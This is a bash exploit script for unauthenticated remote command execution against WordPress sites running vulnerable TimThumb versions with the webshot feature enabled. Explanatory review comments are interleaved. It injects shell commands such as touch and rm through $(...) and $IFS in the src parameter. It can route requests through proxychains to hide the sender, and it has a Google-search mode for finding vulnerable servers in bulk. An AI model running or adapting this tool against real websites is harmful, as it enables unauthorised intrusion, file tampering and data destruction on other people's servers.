#!/bin/bash
# Wordpress TimThumb Remote Command Execution Exploit (0day) v20140627 by 1N3
# (c) http://treadstonesecurity.blogspot.ca
# Usage: sh timthumb_0day.sh <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]
#
# ABOUT:
# TimThumb's "Webshot" feature allows certain commands to be executed on the
# vulnerable website remotely (no authentication required). With a simple command, an
# attacker can create, remove and modify any files on your server. TimThumb 2.8.11-2.8.13
# with the WEBSHOT_ENABLED option enabled appears to be vulnerable.
#
# USAGE:
# ./timthumb_0day.sh <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]
#
# NOTE: proxy and command fields are optional.
#
# EXAMPLE:
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php none rm$IFS/tmp/a.txt
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php proxy 'rm$IFS/tmp/a.txt'
# BANNER
# Clears the terminal and prints the tool banner. The rest of the file is a
# flat sequence of requirement checks followed by one of two request paths
# (proxied or direct), each of which ends in `exit`.
clear
echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== Wordpress TimThumb Remote Command Execution Exploit (0day) by 1N3"
echo ""
# VARS
# Tool lookups via `which`: each variable holds the binary's path, or the
# empty string when the tool is not on PATH. UNICORNSCAN is assigned but is
# never referenced again anywhere in this script.
UNICORNSCAN=`which unicornscan`
CURL=`which curl`
PROXYCHAINS=`which proxychains`
# Positional arguments as documented in the header:
#   $1  host or IP, or the literal word "google"
#   $2  URL path to timthumb.php on the target
#   $3  the literal word "proxy" selects proxychains; any other value is direct
#   $4  optional command; when empty the built-in touch command is used
# None of them is validated beyond the emptiness checks below.
TARGET=$1
BASE_PATH=$2
PROXY=$3
COMMAND=$4
# REQUIREMENTS
# NOTE(review): the message claims the scan continues without proxy support,
# but the branch exits immediately, so a missing proxychains aborts the run.
# Every `exit` in this script is bare, so the exit status is that of the
# preceding echo (0) even on usage or requirement errors.
if [ "$PROXYCHAINS" == "" ]; then
echo "(--==== Proxychains not installed! Continuing scan without proxy support..."
exit
fi
# curl is used by both request paths below, so its absence is fatal.
if [ "$CURL" == "" ]; then
echo "(--==== Curl not installed! Exiting..."
exit
fi
# Usage check: target and path are mandatory; proxy and command are optional.
if [ -z "$TARGET" ] || [ -z "$BASE_PATH" ]; then
echo "(--==== Usage: $0 <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]"
exit
fi
# $TARGET is unquoted in this test, and `==` inside `[ ]` is a bash
# extension; the `sh timthumb_0day.sh` form shown in the header usage may
# not accept it.
if [ $TARGET == "google" ]; then
# USE GOOGLE HACKING TO FIND VULNERABLE SERVERS
# Opens iceweasel on a hard-coded search URL in the background and exits.
# No request is sent to any target on this path.
echo "Searching Google..."
iceweasel 'https://www.google.com/search?q=TimThumb+version+%3A+2.8.13&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=iceweasel-a#q=inurl:%27%2Ftimthumb.php%27+filetype:php+inurl:plugins+inurl:wp-content&rls=org.mozilla:en-US:unofficial' &
exit
fi
# Only the exact literal "proxy" selects the proxychains path. The "none"
# shown in the header examples is simply any other value and falls through
# to the direct-connection branch.
if [ "$PROXY" = "proxy" ]; then
#PROXY ENABLED
echo "(--==== Scanning via proxy..."
# $COMMAND is unquoted: an unset or empty value passes the -z test, while a
# value containing whitespace is word-split into several test arguments.
if [ -z $COMMAND ]; then
# RUN DEFAULT COMMAND (ie. touch /tmp/a.txt)
# The request is a plain GET to the configured timthumb.php path with
# webshot=1 and a src parameter that embeds $(...). That query string is
# exactly what a server-side access log or WAF rule would see. The single
# quotes keep $(...) and $IFS literal in the URL instead of expanding them
# in this shell. Only response lines containing "version" are printed, and
# curl's own exit status is never checked.
echo "(--==== Sending exploit request to: "$TARGET
echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)'
proxychains curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)' | grep version
# "local system" in this message refers to the target host: per the header,
# the embedded command runs on the vulnerable site, not on this machine.
echo "(--==== Exploit Sent! Check the local system for /tmp/a.txt..."
else
# RUN CUSTOM COMMAND
# Same request shape as above with $4 substituted inside $(...). $COMMAND is
# unquoted in both the echo and the URL, so it is subject to word splitting.
echo "(--==== Sending exploit request to: "$TARGET
echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')'
proxychains curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')' | grep version
echo "(--==== Exploit Sent!"
fi
exit
else
# NO PROXY
# Mirror of the proxied branch above with curl invoked directly; the two
# branches differ only in the proxychains prefix.
echo "(--==== Scanning via direct connection..."
if [ -z $COMMAND ]; then
# RUN DEFAULT COMMAND (ie. touch /tmp/a.txt)
echo "(--==== Sending exploit request to: "$TARGET
echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)'
curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)' | grep version
echo "(--==== Exploit Sent! Check the local system for /tmp/a.txt..."
else
# RUN CUSTOM COMMAND
echo "(--==== Sending exploit request to: "$TARGET
echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')'
curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')' | grep version
echo "(--==== Exploit Sent!"
fi
exit
fi
# Unreachable: both arms of the if/else above end in `exit`, so the
# completion message below is never printed.
echo ""
echo "(--==== Scan Complete!"
exit